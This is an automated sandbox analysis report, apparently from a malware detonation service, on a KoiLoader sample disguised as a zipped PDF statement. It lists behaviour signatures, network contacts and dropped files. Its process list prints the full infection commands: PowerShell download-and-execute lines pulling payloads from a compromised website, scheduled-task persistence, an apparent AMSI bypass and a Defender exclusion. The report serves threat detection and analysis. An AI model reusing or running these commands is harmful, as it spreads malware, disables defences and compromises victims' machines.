Analysis Overview
SHA256
f2a993d66e959f8358bcb7023095655856c9f9a172c20a1b92042077a05a7916
Threat Level: Known bad
The file 01_11_2024_stmnt.pdf.zip was found to be: Known bad.
Malicious Activity Summary
KoiLoader
Koiloader family
Detects KoiLoader payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Indicator Removal: Clear Persistence
System Location Discovery: System Language Discovery
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 16:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 16:49
Reported
2024-11-08 16:52
Platform
win11-20241007-en
Max time kernel
147s
Max time network
148s
Command Line
Signatures
KoiLoader
Koiloader family
Detects KoiLoader payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: Clear Persistence
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\01_11_2024_stmnt.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comma [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $g21Qt8Fs4AYjWaTive = New-Object Net.WebClient; $hto = $g21Qt8Fs4AYjWaTive.DownloadData('https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/stomachersjkl.php'); $g21Qt8Fs4AYjWaTive.DownloadFile('https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/destineziteQaJxo.php', 'gE1sWzFkjThmeR.js'); schtasks /create /sc minute /f /mo 1 /tr ([System.Text.Encoding]::UTF8.GetString($hto) + $env:programdata + '\' + ('gE1sWzFkjThmeR.js ' * 2)) /tn PVN5ibu1j;
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /f /mo 1 /tr "wscript C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js " /tn PVN5ibu1j
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z2E44DN04TE'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/sd2.ps1')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(IWR -UseBasicParsing 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/sd2.ps1')
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\r02510207-a8a1-401b-a8b2-969e44fe3fefr.js"
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zWXW5OK2POI'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
C:\Windows\System32\wscript.exe
C:\Windows\System32\wscript.exe "C:\ProgramData\r02510207-a8a1-401b-a8b2-969e44fe3fefr.js"
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\gE1sWzFkjThmeR.js gE1sWzFkjThmeR.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\BTB1F8IIM4QD.js -usebasi 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/vulvaehP4l.php'; schtasks /delete /tn gE1sWzFkjThmeR.js /f; wscript $env:programdata\BTB1F8IIM4QD.js "
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn gE1sWzFkjThmeR.js /f
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\ProgramData\BTB1F8IIM4QD.js
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php'; $l2 = 'https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zF8XLPN799Z'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.scuoladanzalibellula.it | udp |
| IT | 185.81.0.180:443 | www.scuoladanzalibellula.it | tcp |
| US | 8.8.8.8:53 | 180.0.81.185.in-addr.arpa | udp |
| UA | 82.118.19.30:80 | 82.118.19.30 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ar0i5dy.cbb.ps1
C:\ProgramData\gE1sWzFkjThmeR.js
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\ProgramData\BTB1F8IIM4QD.js
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache